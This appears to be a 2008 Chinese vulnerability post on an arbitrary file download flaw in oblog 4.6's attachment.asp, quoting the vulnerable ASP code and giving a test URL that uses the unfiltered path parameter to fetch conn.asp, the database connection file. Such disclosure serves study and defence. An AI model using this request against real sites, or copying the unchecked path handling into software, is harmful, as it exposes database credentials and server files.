|
oblog文件下载漏洞
樱木花盗 发表于 2008-4-14 12:50:36 |
漏洞存在oblog版本4.6sql/access |
描述:
漏洞文件:attachment.asp,path参数过滤不严。导致可以下载任何文件。
<!-- #i nclude file="inc/inc_syssite.asp" -->
<%
Dim Path,rs,FileID,ShowDownErr,uid,file_ext
Dim SQL
Path = Trim(Request("path"))
FileID = Trim(Request("FileID"))
If FileID ="" And Path = "" Then
Response.Write "参数不足"
Response.End
End If
If CheckDownLoad Then
If Path = "" Then
set rs = Server.CreateObject("ADODB.RecordSet")
link_database
SQL = ("select file_path,userid,file_ext,ViewNum FROM oblog_upfile Where FileID = "&CLng(FileID))
rs.open sql,conn,1,3
If Not rs.Eof Then
uid = rs(1)
file_ext = rs(2)
rs("ViewNum") = rs("ViewNum") + 1
rs.Update
downloadFile Server.MapPath(rs(0)),0
Else
Response.Status=404
Response.Write "该附件不存在!"
End If
rs.Close
Set rs = Nothing
Else
If true_domain = 1 Then
downloadFile Server.MapPath(Replace(Path,blogurl,"")),1
else
downloadFile Server.MapPath(Path),1
End If
End If
Else
'如果附件为图片的话,当权限检验无法通过则调用一默认图片,防止<img>标记无法调用,影响显示效果
If Path = "" Then
Response.Status=403
Response.Write ShowDownErr
Response.End
Else
downloadFile Server.MapPath(blogdir&"images/oblog_powered.gif"),1
End if
End if |
<* 参考:
http://www.52cmd.cn
*> |
测试方法:
[警 告]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
http://test.cn/attachment.asp?path=./conn.asp | |
|
发表评论:
|
